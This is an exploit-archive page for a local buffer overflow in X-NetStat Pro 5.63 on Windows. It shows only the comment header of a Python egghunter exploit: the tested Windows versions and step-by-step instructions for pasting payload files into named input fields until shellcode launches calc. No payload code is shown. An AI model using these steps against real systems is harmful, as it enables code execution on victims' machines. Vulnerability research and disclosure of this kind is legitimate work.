Xnetstat pro 5.63 local buffer overflow Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2019-03-25 |
Type : local |
Platform : windows
This exploit / vulnerability Xnetstat pro 5.63 local buffer overflow is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-23 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Vendor Homepage: https://freshsoftware.com #
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe #
# Version: 5.63 #
# Special Thanks to my wife #
# The program has Local Buffer Overflow in several places. #
# Note: Although there are even more simple codes to this vulnerability, #
# this technique (EggHunter) has been used to run vulnerability in different windows versions. #
# Steps : #
# 1- Run python code : X-NetStat.py ( Three files are created ) #
# 2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL" #
# --> Enter --> Close HTTP Client window. #
# 3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok #
# --> Wait a litle --> Shellcode (Calc) open #
# Also Instead of the third stage you can : #
# File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" --> #
# Then Press Open file (Folder) Icon --> Wait a litle --> Shellcode (Calc) open #
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#---------------------------------------------------------------------------------------------------------#